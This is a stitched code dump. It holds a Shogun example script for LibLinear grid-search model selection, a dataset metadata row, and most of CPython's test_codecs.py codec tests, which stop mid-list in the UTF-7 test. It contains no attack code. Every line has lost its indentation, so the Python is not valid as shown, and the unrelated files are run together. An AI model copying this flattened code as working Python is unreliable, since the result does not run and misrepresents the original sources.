# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Written (W) 2011 Heiko Strathmann
# Copyright (C) 2011 Berlin Institute of Technology and Max-Planck-Society
#
from numpy.random import randn
from numpy import *
# generate some overlapping training vectors
num_vectors=100
vec_distance=1
traindat=concatenate((randn(2,num_vectors)-vec_distance,
randn(2,num_vectors)+vec_distance), axis=1)
label_traindat=concatenate((-ones(num_vectors), ones(num_vectors)));
parameter_list = [[traindat,label_traindat]]
def modelselection_grid_search_liblinear_modular (traindat=traindat, label_traindat=label_traindat):
from modshogun import CrossValidation, CrossValidationResult
from modshogun import ContingencyTableEvaluation, ACCURACY
from modshogun import StratifiedCrossValidationSplitting
from modshogun import GridSearchModelSelection
from modshogun import ModelSelectionParameters, R_EXP
from modshogun import ParameterCombination
from modshogun import BinaryLabels
from modshogun import RealFeatures
from modshogun import LibLinear, L2R_L2LOSS_SVC
# build parameter tree to select C1 and C2
param_tree_root=ModelSelectionParameters()
c1=ModelSelectionParameters("C1");
param_tree_root.append_child(c1)
c1.build_values(-1.0, 0.0, R_EXP);
c2=ModelSelectionParameters("C2");
param_tree_root.append_child(c2);
c2.build_values(-1.0, 0.0, R_EXP);
# training data
features=RealFeatures(traindat)
labels=BinaryLabels(label_traindat)
# classifier
classifier=LibLinear(L2R_L2LOSS_SVC)
# print all parameter available for modelselection
# Dont worry if yours is not included but, write to the mailing list
#classifier.print_modsel_params()
# splitting strategy for cross-validation
splitting_strategy=StratifiedCrossValidationSplitting(labels, 10)
# evaluation method
evaluation_criterium=ContingencyTableEvaluation(ACCURACY)
# cross-validation instance
cross_validation=CrossValidation(classifier, features, labels,
splitting_strategy, evaluation_criterium)
cross_validation.set_autolock(False)
# model selection instance
model_selection=GridSearchModelSelection(cross_validation, param_tree_root)
# perform model selection with selected methods
#print "performing model selection of"
#param_tree_root.print_tree()
best_parameters=model_selection.select_model()
# print best parameters
#print "best parameters:"
#best_parameters.print_tree()
# apply them and print result
best_parameters.apply_to_machine(classifier)
result=cross_validation.evaluate()
#result.print_result()
if __name__=='__main__':
print('ModelSelectionGridSearchLibLinear')
modelselection_grid_search_liblinear_modular(*parameter_list[0])
| gpl-3.0 |
zhjunlang/kbengine | kbe/res/scripts/common/Lib/test/test_codecs.py | 60 | 111483 | import codecs
import contextlib
import io
import locale
import sys
import unittest
import warnings
import encodings
from test import support
if sys.platform == 'win32':
VISTA_OR_LATER = (sys.getwindowsversion().major >= 6)
else:
VISTA_OR_LATER = False
try:
import ctypes
except ImportError:
ctypes = None
SIZEOF_WCHAR_T = -1
else:
SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
def check(input, expect):
self.assertEqual(coder(input), (expect, len(input)))
return check
class Queue(object):
"""
queue: write bytes at one end, read bytes from the other end
"""
def __init__(self, buffer):
self._buffer = buffer
def write(self, chars):
self._buffer += chars
def read(self, size=-1):
if size<0:
s = self._buffer
self._buffer = self._buffer[:0] # make empty
return s
else:
s = self._buffer[:size]
self._buffer = self._buffer[size:]
return s
class MixInCheckStateHandling:
def check_state_handling_decode(self, encoding, u, s):
for i in range(len(s)+1):
d = codecs.getincrementaldecoder(encoding)()
part1 = d.decode(s[:i])
state = d.getstate()
self.assertIsInstance(state[1], int)
# Check that the condition stated in the documentation for
# IncrementalDecoder.getstate() holds
if not state[1]:
# reset decoder to the default state without anything buffered
d.setstate((state[0][:0], 0))
# Feeding the previous input may not produce any output
self.assertTrue(not d.decode(state[0]))
# The decoder must return to the same state
self.assertEqual(state, d.getstate())
# Create a new decoder and set it to the state
# we extracted from the old one
d = codecs.getincrementaldecoder(encoding)()
d.setstate(state)
part2 = d.decode(s[i:], True)
self.assertEqual(u, part1+part2)
def check_state_handling_encode(self, encoding, u, s):
for i in range(len(u)+1):
d = codecs.getincrementalencoder(encoding)()
part1 = d.encode(u[:i])
state = d.getstate()
d = codecs.getincrementalencoder(encoding)()
d.setstate(state)
part2 = d.encode(u[i:], True)
self.assertEqual(s, part1+part2)
class ReadTest(MixInCheckStateHandling):
def check_partial(self, input, partialresults):
# get a StreamReader for the encoding and feed the bytestring version
# of input to the reader byte by byte. Read everything available from
# the StreamReader and check that the results equal the appropriate
# entries from partialresults.
q = Queue(b"")
r = codecs.getreader(self.encoding)(q)
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
q.write(bytes([c]))
result += r.read()
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(r.read(), "")
self.assertEqual(r.bytebuffer, b"")
# do the check again, this time using a incremental decoder
d = codecs.getincrementaldecoder(self.encoding)()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# Check whether the reset method works properly
d.reset()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# check iterdecode()
encoded = input.encode(self.encoding)
self.assertEqual(
input,
"".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
)
def test_readline(self):
def getreader(input):
stream = io.BytesIO(input.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
def readalllines(input, keepends=True, size=None):
reader = getreader(input)
lines = []
while True:
line = reader.readline(size=size, keepends=keepends)
if not line:
break
lines.append(line)
return "|".join(lines)
s = "foo\nbar\r\nbaz\rspam\u2028eggs"
sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
sexpectednoends = "foo|bar|baz|spam|eggs"
self.assertEqual(readalllines(s, True), sexpected)
self.assertEqual(readalllines(s, False), sexpectednoends)
self.assertEqual(readalllines(s, True, 10), sexpected)
self.assertEqual(readalllines(s, False, 10), sexpectednoends)
lineends = ("\n", "\r\n", "\r", "\u2028")
# Test long lines (multiple calls to read() in readline())
vw = []
vwo = []
for (i, lineend) in enumerate(lineends):
vw.append((i*200+200)*"\u3042" + lineend)
vwo.append((i*200+200)*"\u3042")
self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))
# Test lines where the first read might end with \r, so the
# reader has to look ahead whether this is a lone \r or a \r\n
for size in range(80):
for lineend in lineends:
s = 10*(size*"a" + lineend + "xxx\n")
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=True),
size*"a" + lineend,
)
self.assertEqual(
reader.readline(keepends=True),
"xxx\n",
)
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=False),
size*"a",
)
self.assertEqual(
reader.readline(keepends=False),
"xxx",
)
def test_mixed_readline_and_read(self):
lines = ["Humpty Dumpty sat on a wall,\n",
"Humpty Dumpty had a great fall.\r\n",
"All the king's horses and all the king's men\r",
"Couldn't put Humpty together again."]
data = ''.join(lines)
def getreader():
stream = io.BytesIO(data.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
# Issue #8260: Test readline() followed by read()
f = getreader()
self.assertEqual(f.readline(), lines[0])
self.assertEqual(f.read(), ''.join(lines[1:]))
self.assertEqual(f.read(), '')
# Issue #16636: Test readline() followed by readlines()
f = getreader()
self.assertEqual(f.readline(), lines[0])
self.assertEqual(f.readlines(), lines[1:])
self.assertEqual(f.read(), '')
# Test read() followed by read()
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.read(), data[5:])
self.assertEqual(f.read(), '')
# Issue #12446: Test read() followed by readlines()
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
self.assertEqual(f.read(), '')
def test_bug1175396(self):
s = [
'<%!--===================================================\r\n',
' BLOG index page: show recent articles,\r\n',
' today\'s articles, or articles of a specific date.\r\n',
'========================================================--%>\r\n',
'<%@inputencoding="ISO-8859-1"%>\r\n',
'<%@pagetemplate=TEMPLATE.y%>\r\n',
'<%@import=import frog.util, frog%>\r\n',
'<%@import=import frog.objects%>\r\n',
'<%@import=from frog.storageerrors import StorageError%>\r\n',
'<%\r\n',
'\r\n',
'import logging\r\n',
'log=logging.getLogger("Snakelets.logger")\r\n',
'\r\n',
'\r\n',
'user=self.SessionCtx.user\r\n',
'storageEngine=self.SessionCtx.storageEngine\r\n',
'\r\n',
'\r\n',
'def readArticlesFromDate(date, count=None):\r\n',
' entryids=storageEngine.listBlogEntries(date)\r\n',
' entryids.reverse() # descending\r\n',
' if count:\r\n',
' entryids=entryids[:count]\r\n',
' try:\r\n',
' return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
' except StorageError,x:\r\n',
' log.error("Error loading articles: "+str(x))\r\n',
' self.abort("cannot load articles")\r\n',
'\r\n',
'showdate=None\r\n',
'\r\n',
'arg=self.Request.getArg()\r\n',
'if arg=="today":\r\n',
' #-------------------- TODAY\'S ARTICLES\r\n',
' self.write("<h2>Today\'s articles</h2>")\r\n',
' showdate = frog.util.isodatestr() \r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'elif arg=="active":\r\n',
' #-------------------- ACTIVE ARTICLES redirect\r\n',
' self.Yredirect("active.y")\r\n',
'elif arg=="login":\r\n',
' #-------------------- LOGIN PAGE redirect\r\n',
' self.Yredirect("login.y")\r\n',
'elif arg=="date":\r\n',
' #-------------------- ARTICLES OF A SPECIFIC DATE\r\n',
' showdate = self.Request.getParameter("date")\r\n',
' self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'else:\r\n',
' #-------------------- RECENT ARTICLES\r\n',
' self.write("<h2>Recent articles</h2>")\r\n',
' dates=storageEngine.listBlogEntryDates()\r\n',
' if dates:\r\n',
' entries=[]\r\n',
' SHOWAMOUNT=10\r\n',
' for showdate in dates:\r\n',
' entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
' if len(entries)>=SHOWAMOUNT:\r\n',
' break\r\n',
' \r\n',
]
stream = io.BytesIO("".join(s).encode(self.encoding))
reader = codecs.getreader(self.encoding)(stream)
for (i, line) in enumerate(reader):
self.assertEqual(line, s[i])
def test_readlinequeue(self):
q = Queue(b"")
writer = codecs.getwriter(self.encoding)(q)
reader = codecs.getreader(self.encoding)(q)
# No lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=False), "foo")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=False), "")
self.assertEqual(reader.readline(keepends=False), "bar")
writer.write("baz")
self.assertEqual(reader.readline(keepends=False), "baz")
self.assertEqual(reader.readline(keepends=False), "")
# Lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=True), "foo\r")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=True), "\n")
self.assertEqual(reader.readline(keepends=True), "bar\r")
writer.write("baz")
self.assertEqual(reader.readline(keepends=True), "baz")
self.assertEqual(reader.readline(keepends=True), "")
writer.write("foo\r\n")
self.assertEqual(reader.readline(keepends=True), "foo\r\n")
def test_bug1098990_a(self):
s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
s3 = "next line.\r\n"
s = (s1+s2+s3).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), "")
def test_bug1098990_b(self):
s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
s3 = "stillokay:bbbbxx\r\n"
s4 = "broken!!!!badbad\r\n"
s5 = "againokay.\r\n"
s = (s1+s2+s3+s4+s5).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), s4)
self.assertEqual(reader.readline(), s5)
self.assertEqual(reader.readline(), "")
ill_formed_sequence_replace = "\ufffd"
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
"[\\udc80]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
"[�]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
"[]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
"[?]".encode(self.encoding))
bom = "".encode(self.encoding)
for before, after in [("\U00010fff", "A"), ("[", "]"),
("A", "\U00010fff")]:
before_sequence = before.encode(self.encoding)[len(bom):]
after_sequence = after.encode(self.encoding)[len(bom):]
test_string = before + "\uDC80" + after
test_sequence = (bom + before_sequence +
self.ill_formed_sequence + after_sequence)
self.assertRaises(UnicodeDecodeError, test_sequence.decode,
self.encoding)
self.assertEqual(test_string.encode(self.encoding,
"surrogatepass"),
test_sequence)
self.assertEqual(test_sequence.decode(self.encoding,
"surrogatepass"),
test_string)
self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
before + after)
self.assertEqual(test_sequence.decode(self.encoding, "replace"),
before + self.ill_formed_sequence_replace + after)
class UTF32Test(ReadTest, unittest.TestCase):
encoding = "utf-32"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc\x00\x00"
else:
ill_formed_sequence = b"\x00\x00\xdc\x80"
spamle = (b'\xff\xfe\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
spambe = (b'\x00\x00\xfe\xff'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(4*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(8*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read
"", # third byte of BOM read
"", # fourth byte of BOM read => byteorder known
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_32_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_32_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_le)[0])
encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_be)[0])
class UTF32LETest(ReadTest, unittest.TestCase):
encoding = "utf-32-le"
ill_formed_sequence = b"\x80\xdc\x00\x00"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_le_decode(encoded)[0])
class UTF32BETest(ReadTest, unittest.TestCase):
encoding = "utf-32-be"
ill_formed_sequence = b"\x00\x00\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_be_decode(encoded)[0])
class UTF16Test(ReadTest, unittest.TestCase):
encoding = "utf-16"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc"
else:
ill_formed_sequence = b"\xdc\x80"
spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(b"\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(b"\xff\xff\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read => byteorder known
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_16_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_16_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_bug691291(self):
# Files are always opened in binary mode, even if no binary mode was
# specified. This means that no automatic conversion of '\n' is done
# on reading and writing.
s1 = 'Hello\r\nworld\r\n'
s = s1.encode(self.encoding)
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, 'wb') as fp:
fp.write(s)
with support.check_warnings(('', DeprecationWarning)):
reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
with reader:
self.assertEqual(reader.read(), s1)
class UTF16LETest(ReadTest, unittest.TestCase):
encoding = "utf-16-le"
ill_formed_sequence = b"\x80\xdc"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'A\x00Z', 'A\ufffd'),
(b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
(b'\x00\xd8', '\ufffd'),
(b'\x00\xd8A', '\ufffd'),
(b'\x00\xd8A\x00', '\ufffdA'),
(b'\x00\xdcA\x00', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16le', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\x00\xd8\x03\xde')
self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
"\U00010203")
class UTF16BETest(ReadTest, unittest.TestCase):
encoding = "utf-16-be"
ill_formed_sequence = b"\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'\x00A\xff', 'A\ufffd'),
(b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
(b'\xd8\x00', '\ufffd'),
(b'\xd8\x00\xdc', '\ufffd'),
(b'\xd8\x00\x00A', '\ufffdA'),
(b'\xdc\x00\x00A', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16be', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\xd8\x00\xde\x03')
self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
"\U00010203")
class UTF8Test(ReadTest, unittest.TestCase):
encoding = "utf-8"
ill_formed_sequence = b"\xed\xb2\x80"
ill_formed_sequence_replace = "\ufffd" * 3
def test_partial(self):
self.check_partial(
"\x00\xff\u07ff\u0800\uffff\U00010000",
[
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_decoder_state(self):
u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
self.check_state_handling_decode(self.encoding,
u, u.encode(self.encoding))
def test_lone_surrogates(self):
super().test_lone_surrogates()
# not sure if this is making sense for
# UTF-16 and UTF-32
self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
b'[\x80]')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0".decode("utf-8", "surrogatepass")
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@unittest.skipUnless(sys.platform == 'win32',
'cp65001 is a Windows-only codec')
class CP65001Test(ReadTest, unittest.TestCase):
encoding = "cp65001"
def test_encode(self):
tests = [
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xc3\xa9\xe2\x82\xac'),
('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
]
if VISTA_OR_LATER:
tests.extend((
('\udc80', 'strict', None),
('\udc80', 'ignore', b''),
('\udc80', 'replace', b'?'),
('\udc80', 'backslashreplace', b'\\udc80'),
('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
))
else:
tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
for text, errors, expected in tests:
if expected is not None:
try:
encoded = text.encode('cp65001', errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to cp65001 with '
'errors=%r: %s' % (text, errors, err))
self.assertEqual(encoded, expected,
'%a.encode("cp65001", %r)=%a != %a'
% (text, errors, encoded, expected))
else:
self.assertRaises(UnicodeEncodeError,
text.encode, "cp65001", errors)
def test_decode(self):
tests = [
(b'abc', 'strict', 'abc'),
(b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
(b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
(b'\xef\xbf\xbd', 'strict', '\ufffd'),
(b'[\xc3\xa9]', 'strict', '[\xe9]'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
]
if VISTA_OR_LATER:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', None),
(b'[\xed\xb2\x80]', 'ignore', '[]'),
(b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
))
else:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
))
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = raw.decode('cp65001', errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from cp65001 with '
'errors=%r: %s' % (raw, errors, err))
self.assertEqual(decoded, expected,
'%a.decode("cp65001", %r)=%a != %a'
% (raw, errors, decoded, expected))
else:
self.assertRaises(UnicodeDecodeError,
raw.decode, 'cp65001', errors)
@unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
b'[\\udc80]')
self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
b'[�]')
self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
b'[\x80]')
self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
b'[]')
self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
b'[?]')
@unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
def test_readline(self):
self.skipTest("issue #20571: code page 65001 codec does not "
"support partial decoder yet")
class UTF7Test(ReadTest, unittest.TestCase):
encoding = "utf-7"
def test_partial(self):
self.check_partial(
'a+-b\x00c\x80d\u0100e\U00010000f',
[
'a',
'a',
'a+',
'a+-',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b\x00',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c\x80',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d\u0100',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
